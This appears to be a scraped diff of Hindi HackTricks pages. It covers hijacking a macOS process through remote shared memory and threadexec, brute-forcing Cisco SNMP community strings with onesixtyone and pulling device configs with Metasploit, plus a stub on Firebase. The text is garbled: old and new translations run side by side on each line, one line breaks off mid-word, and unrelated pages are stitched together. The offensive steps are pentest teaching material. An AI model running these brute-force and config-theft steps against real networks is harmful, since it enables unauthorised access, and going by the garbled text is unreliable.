उद्देश्य स्थानीय और दूरस्थ कार्यों के बीच साझा मेमोरी स्थापित करना है, जो डेटा स्थानांतरण को सरल बनाता है और बहु-तर्क वाले फ़ंक्शनों को कॉल करने में सहायता करता है। इस दृष्टिकोण में `libxpc` का उपयोग करना और इसके `OS_xpc_shmem` ऑब्जेक्ट प्रकार का लाभ उठाना शामिल है, जो Mach मेमोरी प्रविष्टियों पर आधारित है। उद्देश्य स्थानीय और दूरस्थ कार्यों के बीच साझा स्मृति स्थापित करना है, डेटा स्थानांतरण को सरल बनाना और एकाधिक तर्कों के साथ फ़ंक्शन को बुलाना सुविधाजनक बनाना। इस दृष्टिकोण में `libxpc` और इसके `OS_xpc_shmem` ऑब्जेक्ट प्रकार का सहारा लेना शामिल है, जो मैक मेमोरी एंट्रीज़ पर निर्मित है।
### प्रक्रिया अवलोकन: ### प्रक्रिया अवलोकन:
1. **मेमोरी आवंटन**: 1. **स्मृति आवंटन**:
- `mach_vm_allocate()` का उपयोग करके साझा करने के लिए मेमोरी आवंटित करें। - `mach_vm_allocate()` का उपयोग करके साझा करने के लिए स्मृति आवंटित करें।
- आवंटित मेमोरी क्षेत्र के लिए `xpc_shmem_create()` का उपयोग करके एक `OS_xpc_shmem` ऑब्जेक्ट बनाएं। यह फ़ंक्शन Mach मेमोरी प्रविष्टि के निर्माण को प्रबंधित करेगा और `OS_xpc_shmem` ऑब्जेक्ट के ऑफसेट `0x18` पर Mach send right स्टोर करेगा। - आवंटित स्मृति क्षेत्र के लिए एक `OS_xpc_shmem` ऑब्ज
2. **दूरस्थ प्रक्रिया में साझा मेमोरी बनाना**:
- `malloc()` के दूरस्थ कॉल के साथ दूरस्थ प्रक्रिया में `OS_xpc_shmem` ऑब्जेक्ट के लिए मेमोरी आवंटित करें।
- स्थानीय `OS_xpc_shmem` ऑब्जेक्ट की सामग्री को दूरस्थ प्रक्रिया में कॉपी करें। हालांकि, यह प्रारंभिक कॉपी ऑफसेट `0x18` पर गलत Mach मेमोरी प्रविष्टि नामों के साथ होगी।
3. **Mach मेमोरी प्रविष्टि को सही करना**:
- दूरस्थ कार्य में Mach मेमोरी प्रविष्टि के लिए send right डालने के लिए `thread_set_special_port()` विधि का उपयोग करें।
- ऑफसेट `0x18` पर Mach मेमोरी प्रविष्टि क्षेत्र को दूरस्थ मेमोरी प्रविष्टि के नाम से ओवरराइट करके सही करें।
4. **साझा मेमोरी सेटअप को अंतिम रूप देना**:
- दूरस्थ `OS_xpc_shmem` ऑब्जेक्ट को मान्य करें।
- `xpc_shmem_remote()` के दूरस्थ कॉल के साथ साझा मेमोरी मैपिंग स्थापित करें।
इन चरणों का पालन करके, स्थानीय और दूरस्थ कार्यों के बीच साझा मेमोरी को कुशलतापूर्वक सेटअप किया जाएगा, जिससे डेटा स्थानांतरण और बहु-तर्क वाले फ़ंक्शनों का निष्पादन सीधा हो जाएगा।
## अतिरिक्त कोड स्निपेट
मेमोरी आवंटन और साझा मेमोरी ऑब्जेक्ट निर्माण के लिए:
```c ```c
mach_vm_allocate(); mach_vm_allocate();
xpc_shmem_create(); xpc_shmem_create();
``` ```
प्रोसेस में साझा मेमोरी ऑब्जेक्ट बनाने और सही करने के लिए: दूरस्थ प्रक्रिया में साझा स्मृति वस्तु बनाने और सुधारित करने के लिए:
```c ```c
malloc(); // for allocating memory remotely malloc(); // for allocating memory remotely
thread_set_special_port(); // for inserting send right thread_set_special_port(); // for inserting send right
``` ```
## 5. पूर्ण नियंत्रण प्राप्त करना ## 5. पूर्ण नियंत्रण प्राप्त करना
साझा मेमोरी स्थापित करने और मनमानी निष्पादन क्षमताओं को प्राप्त करने के बाद, हमने मूल रूप से लक्षित प्रक्रिया पर पूर्ण नियंत्रण प्राप्त कर लिया है। इस नियंत्रण को सक्षम करने वाली मुख्य कार्यक्षमताएं हैं: साझा मेमोरी स्थापित करने और विचारशील क्रियान्वयन क्षमताओं को प्राप्त करने पर सफलतापूर्वक, हमने मुख्य रूप से लक्ष्य प्रक्रिया पर पूर्ण नियंत्रण प्राप्त कर लिया है। इस नियंत्रण को संभालने वाले महत्वपूर्ण कार्यक्षमताएँ हैं:
1. **मनमानी मेमोरी ऑपरेशन्स**: 1. **विचारशील मेमोरी परिचालन**:
- साझा क्षेत्र से डेटा की प्रतिलिपि बनाने के लिए `memcpy()` का उपयोग करके मनमानी मेमोरी पढ़ाई करें। - साझा क्षेत्र से डेटा कॉपी करने के लिए `memcpy()` को आह्वान करके विचारशील मेमोरी पढ़ाई करें।
- साझा क्षेत्र में डेटा स्थानांतरित करने के लिए `memcpy()` का उपयोग करके मनमानी मेमोरी लिखाई करें। - साझा क्षेत्र में डेटा स्थानांतरित करने के लिए `memcpy()` का उपयोग करके विचारशील मेमोरी लिखें।
2. **बहु-तर्क वाले फंक्शन कॉल्स को संभालना**: 2. **एकाधिक तर्कों के साथ फ़ंक्शन कॉल का संचालन**:
- 8 से अधिक तर्कों की आवश्यकता वाले फंक्शन्स के लिए, अतिरिक्त तर्कों को कॉलिंग कन्वेंशन के अनुसार स्टैक पर व्यवस्थित करें। - 8 से अधिक तर्कों की आवश्यकता वाले फ़ंक्शनों के लिए, कॉलिंग कन्वेंशन के अनुसार अतिरिक्त तर्कों को स्टैक पर व्यवस्थित करें।
3. **Mach पोर्ट ट्रांसफर**: 3. **Mach पोर्ट स्थानांतरण**:
- पहले से स्थापित पोर्ट्स के माध्यम से Mach संदेशों के माध्यम से कार्यों के बीच Mach पोर्ट्स का स्थानांतरण करें। - पहले स्थापित पोर्ट के माध्यम से Mach संदेशों के माध्यम से कार्यों के बीच Mach पोर्ट स्थानांतरित करें।
4. **फाइल डिस्क्रिप्टर ट्रांसफर**: 4. **फ़ाइल डिस्क्रिप्टर स्थानांतरण**:
- `triple_fetch` में Ian Beer द्वारा उजागर की गई तकनीक, fileports का उपयोग करके प्रक्रियाओं के बीच फाइल डिस्क्रिप्टर्स का स्थानांतरण करें। - `triple_fetch` में उजागर किए गए तकनीक फाइलपोर्ट का उपयोग करके प्रक्रियाओं के बीच फ़ाइल डिस्क्रिप्टर स्थानांतरित करें।
यह व्यापक नियंत्रण [threadexec](https://github.com/bazad/threadexec) पुस्तकालय में समाहित है, जो विस्तृत कार्यान्वयन और पीड़ित प्रक्रिया के साथ इंटरैक्शन के लिए एक उपयोगकर्ता-अनुकूल API प्रदान करता है। यह व्यापक नियंत्रण [threadexec](https://github.com/bazad/threadexec) पुस्तकालय में समाहित है, जो पीड़ित प्रक्रिया के साथ बातचीत के लिए एक विस्तृत कार्यान्वयन और एक उपयोगकर्ता मित्रपूर्ण API प्रदान करता है।
## महत्वपूर्ण विचार: ## महत्वपूर्ण विचार:
- सिस्टम स्थिरता और डेटा अखंडता बनाए रखने के लिए मेमोरी पढ़ने/लिखने के ऑपरेशन्स के लिए `memcpy()` का सही उपयोग सुनिश्चित करें। - सिस्टम स्थिरता और डेटा अखंडता बनाए रखने के लिए मेमोरी पढ़ने/लिखने के लिए `memcpy()` का उचित उपयोग सुनिश्चित करें।
- Mach पोर्ट्स या फाइल डिस्क्रिप्टर्स का स्थानांतरण करते समय, उचित प्रोटोकॉल का पालन करें और लीक या अनचाही पहुंच से बचने के लिए संसाधनों को जिम्मेदारी से संभालें - Mach पोर्ट या फाइल डिस्क्रिप्टर स्थानांतरण करते समय, उचित प्रोटोकॉल का पालन करें और संसाधनों को जिम्मेदारीपूर्वक संभालने के लिए सुनिश्चित करें ताकि लीक या अनहेतु पहुंच से बचा जा सके
इन दिशानिर्देशों का पालन करते हुए और `threadexec` पुस्तकालय का उपयोग करते हुए, कोई भी कुशलतापूर्वक प्रक्रियाओं का प्रबंधन और इंटरैक्शन कर सकता है, लक्षित प्रक्रिया पर पूर्ण नियंत्रण प्राप्त कर सकता है इन दिशानिर्देशों का पालन करके और `threadexec` पुस्तकालय का उपयोग करके, किसी भी लक्ष्य प्रक्रिया पर पूर्ण नियंत्रण प्राप्त करने के लिए प्रक्रियाओं को सूक्ष्म स्तर पर प्रबंधित और बातचीत कर सकते हैं
# संदर्भ # संदर्भ
* https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/ * [https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/](https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में शामिल हों या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>

View file

@ -1,45 +1,45 @@
# Cisco SNMP # सिस्को SNMP
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**. * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>
# Cisco नेटवर्क्स की पेंटेस्टिंग # सिस्को नेटवर्क्स का पेंटेस्टिंग
SNMP एक प्रोटोकॉल है जिसका उपय कंप्यूटर नेटवर्क पर उपकरणों की स्थिति की निगरानी के लिए किया जाता है। यह UDP ट्रांसपोर्ट लेयर प्रोटोकॉल पर काम करता है जिसके पोर्ट नंबर 161/UDP और 162/UDP होते हैं। SNMP एक प्रोटोकॉल है जो कंप्यूटर नेटवर्क पर डिवाइसों की स्थिति का मॉनिटरिंग के लिए उपयोग किया जाता है। यह UDP परिवहन परत प्रोटोकॉल पर काम करता है जिसमें पोर्ट संख्याएं 161/UDP और 162/UDP शामिल हैं।
SNMP कम्युनिटी स्ट्रिंग्स का उपयोग करता है, जो SNMP एजेंट्स और सर्वरों के बीच संचार के लिए पासवर्ड की तरह काम करते हैं। ये कम्युनिटी स्ट्रिंग्स **केवल-पढ़ने (RO) या पढ़ने-लिखने (RW) की अनुमतियाँ** प्रदान करते हैं। पेंटेस्टर्स SNMP का शोषण कर सकते हैं **कम्युनिटी स्ट्रिंग्स को ब्रूट-फोर्सिंग** करके नेटवर्क उपकरणों तक पहुँच प्राप्त करने के लिए SNMP में कम्युनिटी स्ट्रिंग का उपयोग किया जाता है, जो SNMP एजेंट्स और सर्वरों के बीच संचार के लिए पासवर्ड के रूप में काम करते हैं। ये कम्युनिटी स्ट्रिंग्स **केवल पढ़ने या लिखने (RO) अनुमतियाँ** प्रदान करते हैं। पेंटेस्टर्स सिस्को नेटवर्क उपकरणों तक पहुंच प्राप्त करने के लिए SNMP का शोध करके **कम्युनिटी स्ट्रिंग्स को ब्रूट-फोर्सिंग** कर सकते हैं
कम्युनिटी स्ट्रिंग्स पर ब्रूट-फोर्स हमला करने के लिए **[onesixtyone](https://github.com/trailofbits/onesixtyone)** का उपयोग किया जा सकता है। इस टूल को ब्रूट-फोर्सिंग के लिए एक शब्दकोश और लक्ष्य होस्ट्स के IP पते की आवश्यकता होती है: कम्युनिटी स्ट्रिंग्स पर ब्रूट-फोर्स हमला करने के लिए **[onesixtyone](https://github.com/trailofbits/onesixtyone)** का उपयोग किया जा सकता है। इस टूल को ब्रूट-फोर्सिंग के लिए एक शब्दकोश और लक्ष्य होस्टों के आईपी पते की आवश्यकता होती है:
```bash ```bash
onesixtyone -c communitystrings -i targets onesixtyone -c communitystrings -i targets
``` ```
यदि **कम्युनिटी स्ट्रिंग्स का पता चल जाता है**, तो आगे का शोषण संभव हो जाता है। यदि **कम्युनिटी स्ट्रिंग्स** पता चल जाएं, तो आगे और अधिक उत्पीड़न संभव हो जाता है।
### `cisco_config_tftp` ### `cisco_config_tftp`
Metasploit फ्रेमवर्क में `cisco_config_tftp` मॉड्यूल का उपयोग करके, **डिवाइस कॉन्फ़िगरेशन** को कम्युनिटी स्ट्रिंग के मूल्य को जानकर खींचा जा सकता है। **रीड-राइट (RW) अनुमतियों वाली कम्युनिटी स्ट्रिंग की आवश्यकता होती है**। `Metasploit` फ्रेमवर्क में `cisco_config_tftp` मॉड्यूल का उपयोग करके, **डिवाइस कॉन्फ़िगरेशन** को कम्युनिटी स्ट्रिंग के मान को जानकर खींचा जा सकता है। **पढ़ने-लिखने (RW) अनुमतियों वाली कम्युनिटी स्ट्रिंग की आवश्यकता है**।
निम्नलिखित पैरामीटर्स की आवश्यकता होती है: निम्नलिखित पैरामीटर आवश्यक है:
- RW कम्युनिटी स्ट्रिंग (COMMUNITY) - RW कम्युनिटी स्ट्रिंग (COMMUNITY)
- हमलावर का IP पता (LHOST) - हमलावर का आईपी पता (LHOST)
- लक्ष्य उपकरण का IP पता (RHOSTS) - लक्ष्य उपकरण का आईपी पता (RHOSTS)
- डिवाइस कॉन्फ़िगरेशन की आउटपुट डायरेक्टरी के लिए पथ (OUTPUTDIR) - डिवाइस कॉन्फ़िगरेशन के आउटपुट निर्देशिका के लिए पथ (OUTPUTDIR)
मॉड्यूल को कॉन्फ़िगर करने के बाद, शोषण को आरंभ किया जा सकता है। निर्दिष्ट IP पते के साथ होस्ट कॉन्फ़िगरेशन निर्दिष्ट फ़ोल्डर में डाउनलोड किया जाएगा। मॉड्यूल कॉन्फ़िगर करने के बाद, उत्पीड़न प्रारंभ किया जा सकता है। निर्दिष्ट आईपी पते वाले होस्ट कॉन्फ़िगरेशन को निर्दिष्ट फ़ोल्डर में डाउनलोड किया जाएगा।
### `snmp_enum` ### `snmp_enum`
Metasploit फ्रेमवर्क में **`snmp_enum` मॉड्यूल लक्ष्य हार्डवेयर के बारे में जानकारी की प्राप्ति की अनुमति देता है**। पिछले मॉड्यूल की तरह, COMMUNITY पैरामीटर (यहां तक कि केवल पढ़ने की अनुमति वाला स्ट्रिंग) और लक्ष्य डिवाइस का IP पता आवश्यक है: `Metasploit` फ्रेमवर्क में **`snmp_enum` मॉड्यूल लक्ष्य हार्डवेयर के बारे में जानकारी प्राप्त करने की अनुमति देता है**। पिछले मॉड्यूल की तरह, COMMUNITY पैरामीटर (केवल पढ़ने वाली अनुमतियों वाली स्ट्रिंग भी) और लक्ष्य उपकरण का आईपी पता आवश्यक हैं:
```bash ```bash
msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10 msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10
@ -48,14 +48,15 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
# संदर्भ # संदर्भ
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**. * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details> </details>

View file

@ -2,32 +2,32 @@
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** में PR जमा करके।
</details> </details>
## Firebase क्या है ## Firebase क्या है
Firebase मुख्य रूप से मोबाइल एप्लिकेशन के लिए एक बैकएंड-जैसी सेवा है। यह बैकएंड प्रोग्रामिंग का भार हटाने पर ध्यान केंद्रित है और एक अच्छी SDK के साथ साथ अन्य कई रोचक चीजें प्रदान करके एप्लिकेशन और बैकएंड के बीच अंतराक्रिया को सुगम बनाने पर ध्यान केंद्रित है। Firebase एक बैकएंड-एस-एस है जो मुख्य रूप से मोबाइल एप्लिकेशन के लिए है। यह प्रोग्रामिंग बैकएंड की जिम्मेदारी को हटाने पर ध्यान केंद्रित है और एक अच्छी एसडीके के साथ साथ अन्य कई रोचक चीजें प्रदान करता है जो एप्लिकेशन और बैकएंड के बीच बातचीत को सुविधाजनक बनाता है।
जानें Firebase के बारे में और: Firebase के बारे में अधिक जानें:
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %} {% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %}
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** में PR जमा करके।
</details> </details>

View file

@ -1,26 +1,26 @@
